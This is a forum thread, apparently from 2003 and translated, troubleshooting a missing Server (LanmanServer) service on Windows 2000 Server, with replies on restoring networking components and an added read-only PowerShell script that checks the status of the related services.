About the "services" problem in win2kserver.
liujun6677
2003-10-18 12:16:40
In win2kserver, when performing certain operations such as configuring "Routing and Remote Access", the system reports "the Server service is not started"...... Looking under "Services" in "Computer Management", there is no "services" entry; I looked at other, normal machines and they do have "services". Is this the so-called "Server service"? Its "executable" is c:\winnt\system32\services.exe. I can see that file on my machine as well.
How do I fix this problem?
sungod8
2003-10-19
Services that Routing and Remote Access needs to have started:
SERVER
Routing and Remote Access
Remote Registry Service
Q: Control Panel -> Administrative Tools -> Services -> there is no "Server" entry!
The log also says "..... the dependency service lanmanserver does not exist ..."
A: Network Neighborhood, Properties, Local Area Connection, Properties, Install: "Client for Microsoft Networks" and "File and Printer Sharing for Microsoft Networks"
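The check behind the reply above, written as an added example rather than code from the thread: it looks up the three services listed (by their service names, which are assumed here to be LanmanServer, RemoteAccess and RemoteRegistry), reports whether each one is registered at all, disabled, or not running, lists its dependencies, and shows the binary each one actually runs from. It assumes a current Windows host with PowerShell 5.1 or later; Windows 2000 itself has no PowerShell, but the service names and the dependency relationship are the same.

```powershell
# Added example (not from the thread). Assumes PowerShell 5.1+ on a current Windows host.
# Service names (assumed) behind the display names given in the reply above.
$required = @{
    'LanmanServer'   = 'Server'
    'RemoteAccess'   = 'Routing and Remote Access'
    'RemoteRegistry' = 'Remote Registry'
}

function Test-RequiredService {
    param([string]$Name, [string]$DisplayName)
    # -ErrorAction SilentlyContinue: a missing service returns $null instead of an error
    $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue
    if (-not $svc) {
        # Not registered at all: this is the case in the thread, where the event log
        # says the dependency "lanmanserver" does not exist.
        return [pscustomobject]@{
            Name = $Name; DisplayName = $DisplayName
            State = 'MISSING'; StartType = $null; DependsOn = @()
        }
    }
    [pscustomobject]@{
        Name        = $Name
        DisplayName = $DisplayName
        State       = $svc.Status.ToString()
        StartType   = $svc.StartType.ToString()
        DependsOn   = @($svc.ServicesDependedOn | ForEach-Object { $_.Name })
    }
}

$report = foreach ($entry in $required.GetEnumerator()) {
    Test-RequiredService -Name $entry.Key -DisplayName $entry.Value
}
$report | Format-Table Name, DisplayName, State, StartType, @{n='DependsOn'; e={ $_.DependsOn -join ',' }} -AutoSize

# Separate the two situations the thread discusses: the service is absent (networking
# components need to be reinstalled), or it exists but is disabled / stopped / blocked by a
# dependency that is not running.
foreach ($r in $report) {
    if ($r.State -eq 'MISSING') {
        Write-Warning "$($r.DisplayName) ($($r.Name)) is not registered on this machine; reinstall the networking components (Client for Microsoft Networks, File and Printer Sharing) as described above."
    }
    elseif ($r.StartType -eq 'Disabled' -or $r.State -ne 'Running') {
        Write-Warning "$($r.DisplayName) ($($r.Name)) exists but is $($r.State) (start type $($r.StartType)); check its dependencies: $($r.DependsOn -join ', ')"
    }
}

# Show which binary hosts each service. Note that services.exe is the Service Control
# Manager process, not a service called "services"; the original poster mixed the two up.
Get-CimInstance Win32_Service -Filter "Name='LanmanServer' OR Name='RemoteAccess' OR Name='RemoteRegistry'" |
    Select-Object Name, State, StartMode, PathName | Format-Table -AutoSize
```

Run it from an elevated PowerShell prompt; a "MISSING" row for LanmanServer reproduces the symptom described in the thread, while a row that exists but shows Disabled or Stopped points to the other cause raised later in the thread (a disabled service or an unstarted dependency).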
liujun6677
2003-10-18
Control Panel -> Administrative Tools -> Services -> there is no "Server" entry!
The log also says "..... the dependency service lanmanserver does not exist ..."
icuc88
2003-10-18
Control Panel -> Administrative Tools -> Services -> Server
Restart it,
and check whether the service has been disabled or something similar, or whether a service it depends on has not been started.
jy2004
2003-10-18
Check whether the protocol is broken; I suspect that is where the problem is.
tanghui21
2003-10-18
It is not "services" but the Server service.
If that service is missing, try reinstalling the protocol.
ravenkatte
2003-10-18
Open Start -> Run, type services.msc to open the Services console.
If that does not work, try the sfc /scannow command to scan and repair the system files.